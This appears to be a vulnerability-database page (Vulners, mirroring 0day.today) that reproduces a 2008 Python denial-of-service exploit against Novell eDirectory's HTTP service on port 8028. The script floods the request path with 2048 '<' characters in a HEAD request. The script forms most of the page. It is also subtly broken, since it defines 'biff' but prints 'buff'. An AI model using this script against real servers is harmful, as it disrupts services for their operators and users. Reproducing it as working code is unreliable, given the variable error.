Lucene search

K

Novel eDirectory HTTP Denial of Service Exploit

🗓️ 02 Apr 2008 00:00:00Reported by mutsType 
zdt
 zdt
🔗 0day.today👁 15 Views

Exploit code for a Novel eDirectory HTTP Denial of Service vulnerability discovered by Mati Aharoni.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
===============================================
Novel eDirectory HTTP Denial of Service Exploit
===============================================




#!/usr/bin/python
# Novel eDirectory HTTP DOS
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com


import socket
import os
import sys
from time import sleep

biff="<"*2048
print "[*] Payload sent "+ str(len(buff))
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8028 ) )
expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
data=expl.recv(1024)
print data
expl.close()



#  0day.today [2018-02-19]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Apr 2008 00:00Current
7High risk
Vulners AI Score7
15
.json
Report